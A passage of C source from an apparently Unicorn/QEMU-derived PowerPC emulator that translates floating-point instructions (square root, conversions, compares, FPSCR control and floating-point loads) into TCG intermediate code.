gen_compute_fprf_float64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_fsqrts(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_fsqrt(tcg_ctx, t1, tcg_ctx->cpu_env, t0); gen_helper_frsp(tcg_ctx, t1, tcg_ctx->cpu_env, t1); set_fpr(tcg_ctx, rD(ctx->opcode), t1); gen_compute_fprf_float64(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_cr1_from_fpscr(ctx); 
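/*
 * Editor's note: the Rc=1 ("fsqrts.") path above mirrors the record-bit
 * handling in the GEN_FLOAT_* macros -- gen_set_cr1_from_fpscr() copies
 * the top nibble of the FPSCR (the exception summary bits) into CR1, as
 * its shift-by-28 definition earlier in this file shows.
 */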
} tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /*** Floating-Point multiply-and-add ***/ /* fmadd - fmadds */ GEN_FLOAT_ACB(madd, 0x1D, 1, PPC_FLOAT); /* fmsub - fmsubs */ GEN_FLOAT_ACB(msub, 0x1C, 1, PPC_FLOAT); /* fnmadd - fnmadds */ GEN_FLOAT_ACB(nmadd, 0x1F, 1, PPC_FLOAT); /* fnmsub - fnmsubs */ GEN_FLOAT_ACB(nmsub, 0x1E, 1, PPC_FLOAT); /*** Floating-Point round & convert ***/ /* fctiw */ GEN_FLOAT_B(ctiw, 0x0E, 0x00, 0, PPC_FLOAT); /* fctiwu */ GEN_FLOAT_B(ctiwu, 0x0E, 0x04, 0, PPC2_FP_CVT_ISA206); /* fctiwz */ GEN_FLOAT_B(ctiwz, 0x0F, 0x00, 0, PPC_FLOAT); /* fctiwuz */ GEN_FLOAT_B(ctiwuz, 0x0F, 0x04, 0, PPC2_FP_CVT_ISA206); /* frsp */ GEN_FLOAT_B(rsp, 0x0C, 0x00, 1, PPC_FLOAT); /* fcfid */ GEN_FLOAT_B(cfid, 0x0E, 0x1A, 1, PPC2_FP_CVT_S64); /* fcfids */ GEN_FLOAT_B(cfids, 0x0E, 0x1A, 0, PPC2_FP_CVT_ISA206); /* fcfidu */ GEN_FLOAT_B(cfidu, 0x0E, 0x1E, 0, PPC2_FP_CVT_ISA206); /* fcfidus */ GEN_FLOAT_B(cfidus, 0x0E, 0x1E, 0, PPC2_FP_CVT_ISA206); /* fctid */ GEN_FLOAT_B(ctid, 0x0E, 0x19, 0, PPC2_FP_CVT_S64); /* fctidu */ GEN_FLOAT_B(ctidu, 0x0E, 0x1D, 0, PPC2_FP_CVT_ISA206); /* fctidz */ GEN_FLOAT_B(ctidz, 0x0F, 0x19, 0, PPC2_FP_CVT_S64); /* fctidu */ GEN_FLOAT_B(ctiduz, 0x0F, 0x1D, 0, PPC2_FP_CVT_ISA206); /* frin */ GEN_FLOAT_B(rin, 0x08, 0x0C, 1, PPC_FLOAT_EXT); /* friz */ GEN_FLOAT_B(riz, 0x08, 0x0D, 1, PPC_FLOAT_EXT); /* frip */ GEN_FLOAT_B(rip, 0x08, 0x0E, 1, PPC_FLOAT_EXT); /* frim */ GEN_FLOAT_B(rim, 0x08, 0x0F, 1, PPC_FLOAT_EXT); static void gen_ftdiv(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_ftdiv(tcg_ctx, cpu_crf[crfD(ctx->opcode)], t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_ftsqrt(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); gen_helper_ftsqrt(tcg_ctx, cpu_crf[crfD(ctx->opcode)], t0); tcg_temp_free_i64(tcg_ctx, t0); } /*** Floating-Point compare ***/ /* fcmpo */ static void gen_fcmpo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 crf; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); crf = tcg_const_i32(tcg_ctx, crfD(ctx->opcode)); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_fcmpo(tcg_ctx, tcg_ctx->cpu_env, t0, t1, crf); tcg_temp_free_i32(tcg_ctx, crf); gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fcmpu */ static void gen_fcmpu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 crf; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); crf = tcg_const_i32(tcg_ctx, crfD(ctx->opcode)); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_fcmpu(tcg_ctx, tcg_ctx->cpu_env, t0, t1, crf); tcg_temp_free_i32(tcg_ctx, crf); gen_helper_float_check_status(tcg_ctx, 
tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /*** Floating-point move ***/ /* fabs */ /* XXX: beware that fabs never checks for NaNs nor update FPSCR */ static void gen_fabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_andi_i64(tcg_ctx, t1, t0, ~(1ULL << 63)); set_fpr(tcg_ctx, rD(ctx->opcode), t1); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fmr - fmr. */ /* XXX: beware that fmr never checks for NaNs nor update FPSCR */ static void gen_fmr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); set_fpr(tcg_ctx, rD(ctx->opcode), t0); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); } /* fnabs */ /* XXX: beware that fnabs never checks for NaNs nor update FPSCR */ static void gen_fnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_ori_i64(tcg_ctx, t1, t0, 1ULL << 63); set_fpr(tcg_ctx, rD(ctx->opcode), t1); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fneg */ /* XXX: beware that fneg never checks for NaNs nor update FPSCR */ static void gen_fneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_xori_i64(tcg_ctx, t1, t0, 1ULL << 63); set_fpr(tcg_ctx, rD(ctx->opcode), t1); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* fcpsgn: PowerPC 2.05 specification */ /* XXX: beware that fcpsgn never checks for NaNs nor update FPSCR */ static void gen_fcpsgn(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; TCGv_i64 t1; TCGv_i64 t2; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, t2, t0, t1, 0, 63); set_fpr(tcg_ctx, rD(ctx->opcode), t2); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static void gen_fmrgew(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 b0; TCGv_i64 t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } b0 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, b0, t0, 32); get_fpr(tcg_ctx, t0, rA(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, 
t1, t0, b0, 0, 32); set_fpr(tcg_ctx, rD(ctx->opcode), t1); tcg_temp_free_i64(tcg_ctx, b0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_fmrgow(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; TCGv_i64 t1; TCGv_i64 t2; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t0, rB(ctx->opcode)); get_fpr(tcg_ctx, t1, rA(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, t2, t0, t1, 32, 32); set_fpr(tcg_ctx, rD(ctx->opcode), t2); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } /*** Floating-Point status & ctrl register ***/ /* mcrfs */ static void gen_mcrfs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv tmp = tcg_temp_new(tcg_ctx); TCGv_i32 tmask; TCGv_i64 tnew_fpscr = tcg_temp_new_i64(tcg_ctx); int bfa; int nibble; int shift; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } bfa = crfS(ctx->opcode); nibble = 7 - bfa; shift = 4 * nibble; tcg_gen_shri_tl(tcg_ctx, tmp, cpu_fpscr, shift); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], tmp); tcg_gen_andi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfD(ctx->opcode)], 0xf); tcg_temp_free(tcg_ctx, tmp); tcg_gen_extu_tl_i64(tcg_ctx, tnew_fpscr, cpu_fpscr); /* Only the exception bits (including FX) should be cleared if read */ tcg_gen_andi_i64(tcg_ctx, tnew_fpscr, tnew_fpscr, ~((0xF << shift) & FP_EX_CLEAR_BITS)); /* FEX and VX need to be updated, so don't set fpscr directly */ tmask = tcg_const_i32(tcg_ctx, 1 << nibble); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, tnew_fpscr, tmask); tcg_temp_free_i32(tcg_ctx, tmask); tcg_temp_free_i64(tcg_ctx, tnew_fpscr); } /* mffs */ static void gen_mffs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); set_fpr(tcg_ctx, rD(ctx->opcode), t0); if (unlikely(Rc(ctx->opcode))) { gen_set_cr1_from_fpscr(ctx); } tcg_temp_free_i64(tcg_ctx, t0); } /* mffsl */ static void gen_mffsl(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); /* Mask everything except mode, status, and enables. */ tcg_gen_andi_i64(tcg_ctx, t0, t0, FP_DRN | FP_STATUS | FP_ENABLES | FP_RN); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } /* mffsce */ static void gen_mffsce(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0; TCGv_i32 mask; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t0 = tcg_temp_new_i64(tcg_ctx); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); set_fpr(tcg_ctx, rD(ctx->opcode), t0); /* Clear exception enable bits in the FPSCR. 
*/ tcg_gen_andi_i64(tcg_ctx, t0, t0, ~FP_ENABLES); mask = tcg_const_i32(tcg_ctx, 0x0003); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t0, mask); tcg_temp_free_i32(tcg_ctx, mask); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_helper_mffscrn(DisasContext *ctx, TCGv_i64 t1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 mask = tcg_const_i32(tcg_ctx, 0x0001); gen_reset_fpstatus(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_fpscr); tcg_gen_andi_i64(tcg_ctx, t0, t0, FP_DRN | FP_ENABLES | FP_RN); set_fpr(tcg_ctx, rD(ctx->opcode), t0); /* Mask FPSCR value to clear RN. */ tcg_gen_andi_i64(tcg_ctx, t0, t0, ~FP_RN); /* Merge RN into FPSCR value. */ tcg_gen_or_i64(tcg_ctx, t0, t0, t1); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t0, mask); tcg_temp_free_i32(tcg_ctx, mask); tcg_temp_free_i64(tcg_ctx, t0); } /* mffscrn */ static void gen_mffscrn(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); /* Mask FRB to get just RN. */ tcg_gen_andi_i64(tcg_ctx, t1, t1, FP_RN); gen_helper_mffscrn(ctx, t1); tcg_temp_free_i64(tcg_ctx, t1); } /* mffscrni */ static void gen_mffscrni(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1; if (unlikely(!(ctx->insns_flags2 & PPC2_ISA300))) { return; } if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } t1 = tcg_const_i64(tcg_ctx, (uint64_t)RM(ctx->opcode)); gen_helper_mffscrn(ctx, t1); tcg_temp_free_i64(tcg_ctx, t1); } /* mtfsb0 */ static void gen_mtfsb0(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t crb; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } crb = 31 - crbD(ctx->opcode); gen_reset_fpstatus(tcg_ctx); if (likely(crb != FPSCR_FEX && crb != FPSCR_VX)) { TCGv_i32 t0; t0 = tcg_const_i32(tcg_ctx, crb); gen_helper_fpscr_clrbit(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } } /* mtfsb1 */ static void gen_mtfsb1(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t crb; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } crb = 31 - crbD(ctx->opcode); gen_reset_fpstatus(tcg_ctx); /* XXX: we pretend we can only do IEEE floating-point computations */ if (likely(crb != FPSCR_FEX && crb != FPSCR_VX && crb != FPSCR_NI)) { TCGv_i32 t0; t0 = tcg_const_i32(tcg_ctx, crb); gen_helper_fpscr_setbit(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } /* We can raise a deferred exception */ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); } /* mtfsf */ static void gen_mtfsf(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; TCGv_i64 t1; int flm, l, w; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } flm = FPFLM(ctx->opcode); l = FPL(ctx->opcode); w = FPW(ctx->opcode); if (unlikely(w & !(ctx->insns_flags2 & PPC2_ISA205))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_reset_fpstatus(tcg_ctx); if (l) { t0 = 
tcg_const_i32(tcg_ctx, (ctx->insns_flags2 & PPC2_ISA205) ? 0xffff : 0xff); } else { t0 = tcg_const_i32(tcg_ctx, flm << (w * 8)); } t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } /* We can raise a deferred exception */ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, t1); } /* mtfsfi */ static void gen_mtfsfi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int bf, sh, w; TCGv_i64 t0; TCGv_i32 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } w = FPW(ctx->opcode); bf = FPBF(ctx->opcode); if (unlikely(w & !(ctx->insns_flags2 & PPC2_ISA205))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } sh = (8 * w) + 7 - bf; gen_reset_fpstatus(tcg_ctx); t0 = tcg_const_i64(tcg_ctx, ((uint64_t)FPIMM(ctx->opcode)) << (4 * sh)); t1 = tcg_const_i32(tcg_ctx, 1 << sh); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } /* We can raise a deferred exception */ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); } /*** Floating-point load ***/ #define GEN_LDF(name, ldop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDUF(name, ldop, opc, type) \ static void glue(gen_, name##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDUXF(name, ldop, opc, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDXF(name, ldop, opc2, opc3, type) \ static void glue(gen_, 
name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDFS(name, ldop, op, type) \ GEN_LDF(name, ldop, op | 0x20, type); \ GEN_LDUF(name, ldop, op | 0x21, type); \ GEN_LDUXF(name, ldop, op | 0x01, type); \ GEN_LDXF(name, ldop, 0x17, op | 0x00, type) static void gen_qemu_ld32fs(DisasContext *ctx, TCGv_i64 dest, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_qemu_ld_i32(tcg_ctx, tmp, addr, ctx->mem_idx, DEF_MEMOP(MO_UL)); gen_helper_todouble(tcg_ctx, dest, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } /* lfd lfdu lfdux lfdx */ GEN_LDFS(lfd, ld64_i64, 0x12, PPC_FLOAT); /* lfs lfsu lfsux lfsx */ GEN_LDFS(lfs, ld32fs, 0x10, PPC_FLOAT); /* lfdepx (external PID lfdx) */ static void gen_lfdepx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; CHK_SV; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_ld_i64(tcg_ctx, t0, EA, PPC_TLB_EPID_LOAD, DEF_MEMOP(MO_Q)); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* lfdp */ static void gen_lfdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0); t0 = tcg_temp_new_i64(tcg_ctx); /* * We only need to swap high and low halves. gen_qemu_ld64_i64 * does necessary 64-bit byteswap already. */ if (unlikely(ctx->le_mode)) { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); } else { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* lfdpx */ static void gen_lfdpx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); t0 = tcg_temp_new_i64(tcg_ctx); /* * We only need to swap high and low halves. gen_qemu_ld64_i64 * does necessary 64-bit byteswap already. 
